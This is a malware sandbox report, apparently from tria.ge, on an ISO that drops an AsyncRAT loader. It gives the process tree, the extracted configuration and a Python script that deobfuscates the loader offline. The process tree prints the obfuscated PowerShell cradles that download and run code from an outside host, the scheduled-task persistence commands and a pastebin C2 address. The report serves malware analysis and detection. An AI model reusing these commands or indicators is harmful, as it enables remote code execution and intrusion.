Analysis
max time kernel: 149s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 11/07/2024, 21:49
Static task
static1
General
Target: Statment#924869506.iso
Size: 1.4MB
MD5: 4b0aa2a63703f774aa8687300200a04d
SHA1: af1118e88a4aad29bbc8760ed2f1b7a7a5017042
SHA256: 8dda70b17eda9096c62343eec5f60a3ed132f66a6f3d2e58c39afbad7280e9bc
SHA512: ab280a85edbec30283be854fc1ebce7936561ffc00d0108411f65e4b6508c586875448db31c78686275c9aeae2aba5649ff6acafc73047608ebc269190e84bdc
SSDEEP: 384:6BP01dUB7P1dUB7OpnIUAkgko0oUQEwEo0i5UAEgEo0oUwkQko0IUAkgko0oUQEu:6d01dE7P1dE7OpCAtVAi
Malware Config
Extracted: asyncrat
AWS | 3Losh
Elsa3eed
AsyncMutex_alosh
delay: 3
install: false
install_folder: %AppData%
pastebin_config: https://pastebin.com/raw/C7vDhgZQ
Signatures

Blocklisted process makes network request (5 IoCs)
  flow  pid   process
  43    4148  WScript.exe
  49    2132  powershell.exe
  50    1912  powershell.exe
  56    2132  powershell.exe
  62    1912  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 4 IoCs)
Run PowerShell and hide display window.
  pid   process
  2132  powershell.exe
  1912  powershell.exe
  3436  powershell.exe
  4792  powershell.exe

Checks computer location settings (2 TTPs, 4 IoCs)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                  process
  Key value queried  \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation  WScript.exe
  (four identical rows, one per WScript.exe instance in the process tree)

Enumerates connected drives (3 TTPs, 3 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  description              ioc     process
  File opened (read-only)  \??\E:  Notepad.exe
  File opened (read-only)  \??\E:  WScript.exe
  File opened (read-only)  \??\E:  WScript.exe
  E: is the submitted ISO mounted by the shell (the .wsf is executed from E:\ in the process tree), not a physical drive.

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow  ioc
  51    pastebin.com
  52    pastebin.com
  These flows match the pastebin_config URL in the extracted AsyncRAT configuration.
Suspicious use of SetThreadContext (2 IoCs)
  description                          pid   process         procid_target
  PID 3436 set thread context of 4820  3436  powershell.exe  104
  PID 4792 set thread context of 3504  4792  powershell.exe  113
  procid_target is the report's own process index (the same number closes each WriteProcessMemory row below), not a Windows PID; the Windows PIDs of the targets are 4820 and 3504.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies registry class (1 IoC)
  description  ioc                                                                              process
  Key created  \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings  cmd.exe

Scheduled Task/Job: Scheduled Task (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   process
  2260  schtasks.exe
  3540  schtasks.exe
Suspicious behavior: EnumeratesProcesses (11 IoCs)
  pid   process
  2132  powershell.exe (2 rows)
  3436  powershell.exe (4 rows)
  1912  powershell.exe (2 rows)
  4820  aspnet_compiler.exe
  4792  powershell.exe (2 rows)

Suspicious use of AdjustPrivilegeToken (49 IoCs)
  process (pid)               privilege enabled
  cmd.exe (4188)              SeManageVolumePrivilege (2 rows)
  powershell.exe (2132)       SeDebugPrivilege
  powershell.exe (3436)       SeDebugPrivilege
  powershell.exe (1912)       SeDebugPrivilege
  aspnet_compiler.exe (4820)  SeDebugPrivilege
  powershell.exe (4792)       SeDebugPrivilege
  powershell.exe (2132), then powershell.exe (1912), 21 rows each in this order: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  The four numeric entries are privilege LUIDs the sandbox did not resolve to names; on Windows 10 they are SeIncreaseWorkingSetPrivilege (33), SeTimeZonePrivilege (34), SeCreateSymbolicLinkPrivilege (35) and SeDelegateSessionUserImpersonatePrivilege (36). Enabling every privilege in the token at once is what the stage-1 PowerShell does in both runs; the other processes enable SeDebugPrivilege only.

Suspicious use of SetWindowsHookEx (1 IoC)
  pid   process
  4820  aspnet_compiler.exe

Suspicious use of WriteProcessMemory (35 IoCs)
  source pid  process         target pid (procid_target)  rows
  4148        WScript.exe     2132 (96)                   2
  2132        powershell.exe  2260 (98)                   2
  2132        powershell.exe  3652 (99)                   2
  4632        WScript.exe     3436 (101)                  2
  3436        powershell.exe  1836 (103)                  3
  3436        powershell.exe  4820 (104)                  8
  2348        WScript.exe     1912 (106)                  2
  1912        powershell.exe  3540 (108)                  2
  1912        powershell.exe  1876 (109)                  2
  2408        WScript.exe     4792 (111)                  2
  4792        powershell.exe  3504 (113)                  8
  The two-row entries are the writes a parent makes into a freshly created child during ordinary process creation and carry no signal on their own. The eight writes from each stage-2 powershell.exe into an argument-less aspnet_compiler.exe (targets 104 and 113), together with the SetThreadContext calls on the same two targets, are the pattern of a payload being written into a suspended host process (process hollowing/injection). PID 4820 is also the only non-PowerShell process that then enables SeDebugPrivilege and calls SetWindowsHookEx.

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

[1] C:\Windows\system32\cmd.exe  PID 4188
    cmd /c C:\Users\Admin\AppData\Local\Temp\Statment#924869506.iso
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\rundll32.exe  PID 2176
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

[1] C:\Windows\System32\Notepad.exe  PID 4344
    "C:\Windows\System32\Notepad.exe" E:\Statment#014095818.wsf
    - Enumerates connected drives

[1] C:\Windows\System32\WScript.exe  PID 4148
    "C:\Windows\System32\WScript.exe" "E:\Statment#014095818.wsf"
    - Blocklisted process makes network request
    - Checks computer location settings
    - Enumerates connected drives
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID 2132
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://newwork.webredirect.org:777/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\schtasks.exe  PID 2260
            "C:\Windows\system32\schtasks.exe" /Create /XML C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml /TN TvMusic2
            - Scheduled Task/Job: Scheduled Task
        [3] C:\Windows\system32\schtasks.exe  PID 3652
            "C:\Windows\system32\schtasks.exe" /Run /TN TvMusic2

[1] C:\Windows\System32\WScript.exe  PID 4632
    C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID 3436
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
        - Command and Scripting Interpreter: PowerShell
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  PID 1836
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  PID 4820
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of SetWindowsHookEx

[1] C:\Windows\System32\WScript.exe  PID 2348
    "C:\Windows\System32\WScript.exe" "E:\Statment#014095818.wsf"
    - Checks computer location settings
    - Enumerates connected drives
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID 1912
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://newwork.webredirect.org:777/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\schtasks.exe  PID 3540
            "C:\Windows\system32\schtasks.exe" /Create /XML C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml /TN TvMusic2
            - Scheduled Task/Job: Scheduled Task
        [3] C:\Windows\system32\schtasks.exe  PID 1876
            "C:\Windows\system32\schtasks.exe" /Run /TN TvMusic2

[1] C:\Windows\System32\WScript.exe  PID 2408
    C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID 4792
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
        - Command and Scripting Interpreter: PowerShell
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe  PID 3504
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Reading the tree: the chain runs twice. WScript.exe 4148 and 2348 each execute the .wsf from the mounted ISO (E:) and launch a hidden-window PowerShell that downloads and executes http://newwork.webredirect.org:777/dddd.mp4 in memory, then registers the task TvMusic2 from an XML dropped in C:\Users\Public\Music and runs it at once. The two WScript.exe processes executing C:\Users\Public\Music\TvMusic.vbs (4632, 2408) have no parent in the tree, consistent with being started by the Task Scheduler service; each runs a second-stage PowerShell that reads its script body from TvMusic.music and starts aspnet_compiler.exe with no arguments as the host for the injected payload (see the SetThreadContext and WriteProcessMemory rows above). Note that the task name is TvMusic2; the trailing digit in the original rendering was the tree-depth marker, not part of the name.
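The two PowerShell command lines in the tree hide their intent in two ways: abbreviated, case-mangled switches (-WIND HIDDeN -eXeC BYPASS -NONI) and a download cradle assembled from three string variables plus a .Replace() that turns the decoy token repoooos back into DownloadString. The following added example, not the report's or the malware author's code, reproduces enough of what powershell.exe does with that text (prefix-matched switches, single-quoted literals with '' escapes, .Replace() chains, '+' concatenation inside IEX) to recover the stage-1 URL and the file the stage-2 launcher reads, without executing anything. The two command lines are copied from the tree (PIDs 2132 and 3436); the switch table is an approximation of powershell.exe's prefix matching and the scoring labels are the example's own.

```python
"""Offline triage of the two PowerShell launcher command lines in this report's process tree.

Added example, not part of the tria.ge report: expands abbreviated powershell.exe switches,
evaluates the string-assembly obfuscation ($v='...', .Replace(), IEX($a+$b+$c)) and extracts
the URL / file path each launcher dereferences. Switch table and scoring are assumptions."""
import re

# Approximation of powershell.exe's switch matching: any unambiguous prefix is accepted.
KNOWN_SWITCHES = ["NoLogo", "NoExit", "NoProfile", "NonInteractive", "WindowStyle",
                  "ExecutionPolicy", "EncodedCommand", "Command", "File", "Sta", "Mta",
                  "InputFormat", "OutputFormat", "Version"]
VALUE_SWITCHES = {"WindowStyle", "ExecutionPolicy", "EncodedCommand", "Command", "File",
                  "InputFormat", "OutputFormat", "Version"}

PS_STRING = r"'((?:[^']|'')*)'"                        # single-quoted literal; '' escapes a quote
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*" + PS_STRING + r"((?:\s*\.replace\(\s*" + PS_STRING +
                       r"\s*,\s*" + PS_STRING + r"\s*\))*)", re.I)
REPLACE_RE = re.compile(r"\.replace\(\s*" + PS_STRING + r"\s*,\s*" + PS_STRING + r"\s*\)", re.I)
IEX_RE = re.compile(r"iex\((.*)\)", re.I | re.S)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s'\")]+")


def normalize_switch(token):
    """'-WIND' -> 'WindowStyle', '-eXeC' -> 'ExecutionPolicy'; ambiguous or unknown stays as-is."""
    stem = token.lstrip("-/").lower()
    hits = [s for s in KNOWN_SWITCHES if s.lower().startswith(stem)]
    return hits[0] if len(hits) == 1 else token


def parse_launcher(cmdline):
    """Split '<exe> -switch value ... <script>' into ({switch: value}, script body)."""
    toks = list(re.finditer(r"\S+", cmdline))
    switches, i = {}, 1                                # toks[0] is the executable path
    while i < len(toks) and toks[i].group().startswith("-"):
        name = normalize_switch(toks[i].group())
        if name in VALUE_SWITCHES and i + 1 < len(toks):
            switches[name], i = toks[i + 1].group(), i + 2
        else:
            switches[name], i = True, i + 1
    body = cmdline[toks[i].start():] if i < len(toks) else ""
    return switches, body


def split_statements(script):
    """Split on ';' outside quotes, so a ';' inside a literal cannot break the parse."""
    stmts, buf, quote = [], [], None
    for ch in script:
        if quote:
            quote = None if ch == quote else quote
        elif ch in "'\"":
            quote = ch
        elif ch == ";":
            stmts.append("".join(buf).strip())
            buf = []
            continue
        buf.append(ch)
    stmts.append("".join(buf).strip())
    return [s for s in stmts if s]


def evaluate(script):
    """Return (variables, resolved IEX arguments). Modelled: string literals, .Replace() chains
    and '+' concatenation of variables; any other IEX argument gets its $vars rendered inline."""
    env, payloads = {}, []
    for stmt in split_statements(script):
        m = ASSIGN_RE.fullmatch(stmt)
        if m:
            value = m.group(2).replace("''", "'")
            for old, new in REPLACE_RE.findall(m.group(3)):   # String.Replace is case-sensitive
                value = value.replace(old.replace("''", "'"), new.replace("''", "'"))
            env[m.group(1).lower()] = value                   # PowerShell variable names are not
            continue
        m = IEX_RE.fullmatch(stmt)
        if m:
            arg = m.group(1)
            if re.fullmatch(r"\s*\$\w+(?:\s*\+\s*\$\w+)*\s*", arg):            # IEX($a+$b+$c)
                payloads.append("".join(env.get(n.lower(), "$" + n) for n in re.findall(r"\$(\w+)", arg)))
            else:                                                               # IEX([IO.File]::$f($p))
                payloads.append(re.sub(r"\$(\w+)", lambda v: env.get(v.group(1).lower(), v.group(0)), arg))
    return env, payloads


def analyze(cmdline):
    switches, body = parse_launcher(cmdline)
    _, payloads = evaluate(body)
    joined = " ".join(payloads)
    checks = [(str(switches.get("WindowStyle", "")).lower() == "hidden", "hidden window"),
              (str(switches.get("ExecutionPolicy", "")).lower() == "bypass", "execution policy bypass"),
              (bool(re.search(r"webclient|downloadstring|downloadfile", joined, re.I)), "in-memory download cradle"),
              (bool(re.search(r"readalltext", joined, re.I)), "executes script body read from disk")]
    return {"switches": switches, "payloads": payloads, "urls": URL_RE.findall(joined),
            "paths": PATH_RE.findall(joined), "reasons": [label for hit, label in checks if hit]}


# Command lines copied from the process tree of this report (PIDs 2132 and 3436).
STAGE1 = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI '
          "Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';"
          "$5s4d='repoooos(''http://newwork.webredirect.org:777/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');"
          "Sleep 1;IeX($g45e+$df54+$5s4d);")
STAGE2 = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -ExecutionPolicy Bypass '
          "$usefont='ReadAllText';$resberrys='C:\\Users\\Public\\Music\\TvMusic.music';"
          "IEx([IO.File]::$usefont($resberrys))")

if __name__ == "__main__":
    for label, cmd in (("PID 2132", STAGE1), ("PID 3436", STAGE2)):
        r = analyze(cmd)
        print(label, r["switches"], r["reasons"], r["payloads"], r["urls"], r["paths"])
```

For PID 2132 the resolved IEX argument is `IeX(NeW-OBJeCT NeT.WeBCLIeNT).DOWNLOADSTRING('http://newwork.webredirect.org:777/dddd.mp4')`, which is why the sandbox flags the download as a blocklisted network request; for PID 3436 it is `[IO.File]::ReadAllText(C:\Users\Public\Music\TvMusic.music)`, so the second stage's real script body is in TvMusic.music, a file the process tree never names directly. Evaluating the literals this way sidesteps the case-mangling entirely; a detection keyed on exact strings such as `DownloadString` or `-WindowStyle Hidden` would miss both command lines.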
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 3KB
  MD5     f41839a3fe2888c8b3050197bc9a0a05
  SHA1    0798941aaf7a53a11ea9ed589752890aee069729
  SHA256  224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
  SHA512  2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\5G8JI3LV\011011101110100000010101010001110010010101101110111010000001010[1]
Filesize: 5KB
  MD5     b1a2ef3cb17547bd40e90d8d5df339f9
  SHA1    5b47f0796d0526025e58843e76355237e9ae7bb9
  SHA256  ff47b96082b5aa66043090a8e902b85e04bd6355b0c2d031b6b26b64e5d3ce7f
  SHA512  393bd4b01405d9c91478adfcb132f1ba194a4b166649d5bf5d0b385f48edfa6268869ec21ba3c8734566008688b386c63855a9b66a1fd810a7e8048a1524dcde

Filesize: 1KB
  MD5     6fe7f2ff9f024b0658a4113e39b826fc
  SHA1    07a0d4ec3b19b62fd409ddb60e843021ac40f1f3
  SHA256  e8f1c76e1435d42070f4d6c600c2301710b291674c00ef9c069508f0fea69cf1
  SHA512  64448c79c9070cbc179df72420c1d86d10ea2ff8ae0d9c3fed5676851cb45a64e65a9d637a1f8f41ecf4dc51c3d5ff8a689519d9ea13d9837b3f9cfaddd13979

Filesize: 1KB
  MD5     3aeb291817e68548c1769a0a696b593e
  SHA1    a7c09a946b1c0ea9d8891b58c162b1e2920b0cec
  SHA256  dbe7bbb781971a705434da18b898aafd5d63247cda23fe34c4080f1a8760b74e
  SHA512  7602ca1281ffde573be783369a975dfe6fef6a4fe00738f162cef29ce8115b8b5c1297855ae2707e1aabad158cd154cc3f893d3c66e4ef0cf4d5b48a1c36873c

Filesize: 856B
  MD5     ec4f2ab7f8d5f6be729ff9dfaa5c6a70
  SHA1    760c281609a80d3b0a3d023aafb9d96da7b16e8e
  SHA256  1eec5a02da8a948b0f3d762ca05eaca1efd32c7af3ea0536b6cf905e27aef3e7
  SHA512  773feafee4ad24d1965c625219d730b19a7a0c3e8d650c5a1d102dfd1c6f5e9433c4f2583ead095812faf91ed87c45a3d4299f61474dc2fc762382a31e1b0562

Filesize: 60B
  MD5     d17fe0a3f47be24a6453e9ef58c94641
  SHA1    6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 1KB
  MD5     26913303151afee791eb652db6764fe2
  SHA1    49418253140caeacb2a1b5bfac48f4bc8e8d5b24
  SHA256  14c815402dddbe953b9fd494e873d453251b3ec6ad996f5000174882040ba248
  SHA512  5e7b1045e34f0f39303dfecc0e601b8212b32acfa466642db1f4e9a0332fbdaffc5762aaf252385d974a1dd37f062e424a3fda5cad5317b1128dbd5b66f09141

Filesize: 452KB
  MD5     6c396a8cfe36cbdc7eb72c2f6c8b2346
  SHA1    6078599b7406607c848e56e162ea79a691a2aff4
  SHA256  9f60cdba09c697e1277f56435afaa9a7922e62a53d87f44d2cf1eeef2eacbaf8
  SHA512  7a79bf3d19e5949df8ecba34339b922c73c3464747b8348e4908859f76c756e8a3c710873b84253ebedc846e83203f0ca72c46b9e6a06cb1a5dfd6ae32aced0b

Filesize: 229B
  MD5     66a1516e1d1e821084441211567d2e87
  SHA1    0e688c9a93ad2cc162ef48ca75e0148e69d95ab1
  SHA256  d57293641ff05fea6af21fb73a4064eca49e5979f2395305bdea2a00a5de6717
  SHA512  1b77505b03a4a9c2c9437fbb94e828f34ed5b74187a258443af778b9450dc346e7027267e4ad6d33ff96c4036d936eba9dee05efbe136678bec6d0f7b68ecf12